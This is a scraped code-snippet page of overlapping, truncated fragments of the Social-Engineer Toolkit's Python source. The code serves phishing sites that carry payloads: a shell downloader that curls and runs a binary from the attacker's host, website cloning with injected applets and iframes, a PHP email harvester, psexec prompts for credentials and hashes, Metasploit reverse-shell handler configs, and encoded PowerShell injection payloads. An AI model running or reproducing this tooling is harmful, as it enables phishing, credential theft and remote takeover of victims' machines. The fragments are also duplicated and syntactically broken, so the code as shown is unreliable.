Ejemplo n.º 1
        # grab osx binary name
        osx_name = setcore.generate_random_string(10,10)
        downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
        # grab nix binary name
        linux_name = setcore.generate_random_string(10,10)
        downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
        filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w")
        shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name))
        shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))

# check to see if we are using a staged approach or direct shell
stager = setcore.check_config("SET_SHELL_STAGER=").lower()
if stager == "off":
        # only trigger if we are using the SETSHELL
        if payload_selection == "SETSHELL":
                # ensure that index.html is really there
                if os.path.isfile("src/program_junk/web_clone/index.html"):
                        setcore.PrintStatus("Stager turned off, prepping direct download payload...")
                        fileopen = file("src/program_junk/web_clone/index.html", "r")
                        filewrite = file("src/program_junk/web_clone/index.html.3", "w")
                        data = fileopen.read()
                        # replace freehugs with ip and port
                        data = data.replace("freehugs", reverse_connection)
                        # here we remove old stuff and replace with everything we need to be newer
#   Name       Current Setting                    Required  Description
#   ----       ---------------                    --------  -----------
#   COMMAND    net group "Domain Admins" /domain  yes       The command you want to execute on the remote host
#   RHOSTS                                        yes       The target address range or CIDR identifier
#   RPORT      445                                yes       The Target port
#   SMBDomain  WORKGROUP                          no        The Windows domain to use for authentication
#   SMBPass                                       no        The password for the specified username
#   SMBSHARE   C$                                 yes       The name of a writeable share on the server
#   SMBUser                                       no        The username to authenticate as
#   THREADS    1                                  yes       The number of concurrent threads
#   WINPATH    WINDOWS                            yes       The name of the remote Windows directory

# msf auxiliary(psexec_command) >

# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
    stage_encoding = "false"
    stage_encoding = "true"

rhosts = input(core.setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to"))  # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(core.setprompt(["32"], "Enter the domain name (hit enter for logon locally)"))  # domain name
threads = input(core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
    domain = "WORKGROUP"
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # remove stale index.html files
        if os.path.isfile("index.html"):
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace("<head>",
                                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
                            counter = 1
                    if counter == 0:

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
            shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status("The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
                    print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
                shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:


    if not apache:
        if multiattack_harv == 'off':
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                    thread.start_new_thread(webserver.start_server, (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:

            # Handle Exceptions
            except Exception as e:
                print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                      "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))

                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                            core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
                            input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
                                                       os.path.join(definepath, "src/html/*.html"),
                                                       os.path.join(core.setdir, "web_clone/*"),
                                                       os.path.join(core.setdir, "msf.exe"),
                                                       os.path.join(core.setdir, "*.jar"),

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
            subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace("<body>",
                                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
            core.print_status("All files have been copied to {}".format(apache_path))


    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()
    # grab nix binary name
    linux_name = setcore.generate_random_string(10, 10)
    downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
        payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
    filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath),
                    "src/program_junk/web_clone/%s" % (osx_name))
                    "src/program_junk/web_clone/%s" % (linux_name))

# check to see if we are using a staged approach or direct shell
stager = setcore.check_config("SET_SHELL_STAGER=").lower()
if stager == "off" or payload_selection == "SETSHELL_HTTP":
    # only trigger if we are using the SETSHELL
    if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
        # ensure that index.html is really there
        if os.path.isfile("src/program_junk/web_clone/index.html"):
                "Stager turned off, prepping direct download payload...")
            fileopen = file("src/program_junk/web_clone/index.html", "r")
            filewrite = file("src/program_junk/web_clone/index.html.3", "w")
            data = fileopen.read()
            # replace freehugs with ip and port
            data = data.replace("freehugs", reverse_connection)
#   Name       Current Setting                    Required  Description
#   ----       ---------------                    --------  -----------
#   COMMAND    net group "Domain Admins" /domain  yes       The command you want to execute on the remote host
#   RHOSTS                                        yes       The target address range or CIDR identifier
#   RPORT      445                                yes       The Target port
#   SMBDomain  WORKGROUP                          no        The Windows domain to use for authentication
#   SMBPass                                       no        The password for the specified username
#   SMBSHARE   C$                                 yes       The name of a writeable share on the server
#   SMBUser                                       no        The username to authenticate as
#   THREADS    1                                  yes       The number of concurrent threads
#   WINPATH    WINDOWS                            yes       The name of the remote Windows directory

# msf auxiliary(psexec_command) >

# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
    stage_encoding = "false"
    stage_encoding = "true"

rhosts = input(
        "Enter the IP Address or range (RHOSTS) to connect to"))  # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(
if operating_system == "posix":
        import pexpect
    except ImportError:
        core.print_error("python-pexpect is not installed.. some things may not work.")

# Py2/3 compatibility
# Python3 renamed raw_input to input
    input = raw_input
except NameError:

# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()

# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
    applet_name = core.generate_random_string(6, 15) + ".jar"
    core.update_options("APPLET_NAME=" + applet_name)

# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
    custom = 1
    core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
    core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
    core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # remove stale index.html files
        if os.path.isfile("index.html"):
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace(
                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
                            counter = 1
                    if counter == 0:

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW +
                  "[*] Moving payload into cloned website." +
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                    os.path.join(core.setdir, applet_name))
                os.path.join(core.setdir, applet_name),
                os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
                                os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
                                os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
                                os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
                "The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                        os.path.join(core.setdir, "msf.exe"),
                        os.path.join(core.setdir, "web_clone/msf.exe"))
                        "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                    os.path.join(core.setdir, "web_clone/msf.exe"),
                    os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (
            r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:


    if not apache:
        if multiattack_harv == 'off':
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server,
                                                args=(web_port, path))
                                            (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:

            # Handle Exceptions
            except Exception as e:
                    "{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                    "[!] There was an issue, printing error: {1}{2}".format(
                        core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop",
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(
                            args=(web_port, path))

                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
                              format(core.bcolors.RED, core.bcolors.ENDC))

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                                "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
                                "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
                                .format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(
                                core.bcolors.GREEN, core.bcolors.ENDC))

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(
                             os.path.join(definepath, "src/html/*.bin"),
                             os.path.join(definepath, "src/html/*.html"),
                             os.path.join(core.setdir, "web_clone/*"),
                             os.path.join(core.setdir, "msf.exe"),
                             os.path.join(core.setdir, "*.jar"),

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(
                    os.path.join(apache_path, "harvester_{}.txt".format(now)),
                    'w') as filewrite:
            subprocess.Popen("chown www-data:www-data '{0}'".format(
                os.path.join(apache_path, "harvester_{}.txt".format(now))),
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace(
                "<body>", "<body>"
                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
            with open(os.path.join(apache_path, "index.php"),
                      "w") as filewrite:
                "All files have been copied to {}".format(apache_path))


    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()
        import pexpect
    except ImportError:
            "python-pexpect is not installed.. some things may not work.")

# Py2/3 compatibility
# Python3 renamed raw_input to input
    input = raw_input
except NameError:

# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()

# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
    applet_name = core.generate_random_string(6, 15) + ".jar"
    core.update_options("APPLET_NAME=" + applet_name)

# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
    custom = 1
        "Note that since you are using a custom payload, you will need to create your OWN listener."
                                index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)

                if unc_embed.lower() == "on":
                        match = re.search("</body.*?>", index_database)
                        if match:
                                index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
                        if not match:
                                index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)

                counter = 0
                # confirm we can find body
                match = re.search("</body.*?>", index_database)
                if match:
                        counter = 1
                        index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
                        check_redirect = core.check_config("AUTO_REDIRECT=")
                        if check_redirect.lower() == "on":
                                index_database = index_database.replace('<param name="nextPage" value=""', '<param name="nextPage" value="%s"' % (url))
                if not match:
                        match = re.search("<head.*?>", index_database)
                        if match:
                                counter = 1
                                index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
                                check_redirect = core.check_config("AUTO_REDIRECT=")
                                if check_redirect.lower() == "on":
                                        index_database = index_database.replace('<param name="nextPage" value=""', '<param name="nextPage" value="%s"' % (url))

                # start appending and prepping the index file
                if java_repeater.lower() == "on":
                        match = re.search("</body.*?>", index_database)
                        if match:
def prep_powershell_payload():

    # grab stage encoding flag
    stage_encoding = core.check_config("STAGE_ENCODING=").lower()
    if stage_encoding == "off":
        stage_encoding = "false"
        stage_encoding = "true"

    # check to see if we are just generating powershell code
    powershell_solo = core.check_options("POWERSHELL_SOLO")

    # check if port is there
    port = core.check_options("PORT=")

    # check if we are using auto_migrate
    auto_migrate = core.check_config("AUTO_MIGRATE=")

    # check if we are using pyinjection
    pyinjection = core.check_options("PYINJECTION=")
    if pyinjection == "ON":
        # check to ensure that the payload options were specified right
        if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
            pyinjection = "on"
            core.print_status("Multi/Pyinjection was specified. Overriding config options.")
            pyinjection = "off"

    # grab ipaddress
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("Enter the ipaddress for the reverse connection: ")
        core.update_options("IPADDR=" + ipaddr)

    # check to see if we are using multi powershell injection
    multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()

    # turn off multi injection if pyinjection is specified
    if pyinjection == "on":
        multi_injection = "off"

    # check what payloads we are using
    powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")

    # if we specified a hostname then default to reverse https/http
    if not core.validate_ip(ipaddr):
        powershell_inject_x86 = "windows/meterpreter/reverse_http"

    # prompt what port to listen on for powershell then make an append to the current
    # metasploit answer file
    if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
        # if we have multi injection on, don't worry about these
        if multi_injection != "on" and pyinjection == "off":
            core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
                data = fileopen.read()
            match = re.search(port, data)
            if not match:
                with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                    filewrite.write("\nuse exploit/multi/handler\n")
                    if auto_migrate == "ON":
                        filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                    filewrite.write("set PAYLOAD {0}\n"
                                    "set LHOST {1}\n"
                                    "set LPORT {2}\n"
                                    "set EnableStageEncoding {3}\n"
                                    "set ExitOnSession false\n"
                                    "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))

    # if we have multi injection on, don't worry about these
    if multi_injection != "on" and pyinjection == "off":
        # check to see if the meta config multi pyinjector is there
        if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
            if core.check_options("PORT=") != 0:
                port = core.check_options("PORT=")
            # if port.options isnt there then prompt
                port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
                if not port:
                    port = "443"

    # turn off multi_injection if we are riding solo from the powershell menu
    if powershell_solo == "ON":
        multi_injection = "off"
        pyinjection = "on"

    # if we are using multi powershell injection
    if multi_injection == "on" and pyinjection == "off":
        core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")

    # define a base variable
    x86 = ""

    # specify a list we will use for later
    multi_injection_x86 = ""

    # here we do some funky loops so we don't need to rewrite the code below
    if multi_injection == "on":
        port = core.check_config("POWERSHELL_MULTI_PORTS=")
        port = port.split(",")

    if multi_injection == "on":
        # iterate through the ports, used for POWERSHELL_MULTI_PORTS
        for ports in port:
            # dont cycle through if theres a blank
            if ports:
                core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
                multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)

                if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set LPORT {3}\n"
                                            "set ExitOnSession false\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

                # if we aren't using multi pyinjector
                if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    # if meta config isn't created yet then create it
                    if not os.path.isfile():
                        with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set ExitOnSession false\n"
                                            "set LPORT {3}\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

    # here we do everything if pyinjection or multi pyinjection was specified
    if pyinjection == "on":
        injections = []
        # read in the file we need for parsing
        with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
            payloads = fileopen.read()[:-1].rstrip()  # strips an extra ,
        payloads = payloads.split(",")
        # format: payload<space>port
        for payload in payloads:
            # format: payload<space>port
            payload = payload.split(" ")
            powershell_inject_x86 = payload[0]
            port = payload[1]
            core.print_status("Generating x86-based powershell injection code...")
            injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
        multi_injection_x86 = ",".join(injections)

    # if its turned to off
    if multi_injection == "off" and pyinjection == "off":
        core.print_status("Generating x86-based powershell injection code...")
        x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)

    # if we are specifying multi powershell injection
    if multi_injection == "on" or pyinjection == "on":
        x86 = multi_injection_x86[1:]  # remove comma at beginning

    # check to see if we want to display the powershell command to the user
    verbose = core.check_config("POWERSHELL_VERBOSE=")
    if verbose.lower() == "on":
        core.print_status("Printing the x86 based encoded code...")

